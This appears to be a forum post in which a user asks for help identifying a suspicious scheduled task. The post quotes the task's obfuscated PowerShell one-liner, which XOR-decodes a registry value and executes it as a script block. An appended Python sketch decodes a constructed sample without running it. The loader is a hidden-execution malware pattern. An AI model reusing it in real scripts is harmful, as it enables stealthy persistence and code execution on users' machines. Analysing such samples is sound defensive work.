
Help to identify suspicious task "jojLNs"



Guest ErichBrutus
Posted

I had a somewhat suspicious task scheduled called "jojLNs" for some reason. It was tasked to run a PowerShell script in System32, the contents of which look something like this:

$BeGAuVtuCJ=[scriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))

Can anyone please tell me what it was doing and whether it was harmful in any way?
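Added example, not part of the original post: the one-liner reads the `6YoArxq` value under the quoted registry key, XORs each element with the summed constant, joins the result into a string and runs it as a script block via `icm`. This Python sketch pulls those parameters out of the loader and decodes an exported copy of the value as text without executing it. The function names and the sample data are constructed here; the real value's contents are not on the page, and the value is assumed to be exported as a list of integers.

```python
import re

# The scheduled task's one-liner, copied verbatim from the post.
LOADER = r"""$BeGAuVtuCJ=[scriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))"""


def parse_loader(script):
    """Extract registry key, value name and XOR key from a loader of this shape."""
    # gp 'KEY').'VALUE'  ->  Get-ItemProperty on KEY, then member access to VALUE
    reg = re.search(r"gp\s+'([^']+)'\)\.'([^']+)'", script)
    # -bxor (a+b+c...)   ->  the key is hidden as a sum of small integers
    xor = re.search(r"-bxor\s*\(([\d+\s]+)\)", script)
    if not reg or not xor:
        raise ValueError("script does not match the registry/XOR loader pattern")
    key = sum(int(term) for term in xor.group(1).split("+"))
    return {"reg_key": reg.group(1), "value_name": reg.group(2), "xor_key": key}


def decode_stage(values, xor_key):
    """XOR each stored number with the key and return the text. Never runs it."""
    return "".join(chr(v ^ xor_key) for v in values)


# Constructed sample: a harmless string encoded with the same key, standing in
# for the exported registry value (hypothetical data, not from the post).
SAMPLE_PLAINTEXT = "Write-Output 'constructed sample'"
SAMPLE_VALUE = [ord(c) ^ 176 for c in SAMPLE_PLAINTEXT]

if __name__ == "__main__":
    info = parse_loader(LOADER)
    print("registry key :", info["reg_key"])
    print("value name   :", info["value_name"])
    print("xor key      :", info["xor_key"], hex(info["xor_key"]))
    print("decoded text :", decode_stage(SAMPLE_VALUE, info["xor_key"]))
```
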

 

